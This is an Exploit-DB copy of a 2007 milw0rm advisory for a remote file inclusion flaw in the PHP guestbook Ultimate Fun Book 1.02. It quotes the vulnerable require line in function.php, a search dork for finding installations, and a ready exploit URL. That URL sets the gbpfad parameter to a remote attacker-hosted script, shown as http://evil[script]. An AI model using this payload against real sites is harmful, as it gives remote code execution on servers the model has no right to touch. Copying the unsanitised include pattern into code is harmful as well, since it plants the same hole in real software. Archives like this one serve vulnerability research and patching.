Ultimate Fun Book 1.02 - 'function.php' Remote File Inclusion

EDB-ID:

3336




Platform:

PHP

Date:

2007-02-20


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

****Ultimate Fun Book 1.02****
**found by:kezzap66345
**contant= [:(]
**download script=http://www.ultimate-fun-board.de
**dork:Ultimate-Fun-Book 1.02

file:

function.php

code:

<?php
require($gbpfad."/config.php");

exploit:

http://target/path/function.php?gbpfad=http://evil[script]

*********thanx= x0r0n,str0ke,shakia***********
*****************************************

# milw0rm.com [2007-02-20]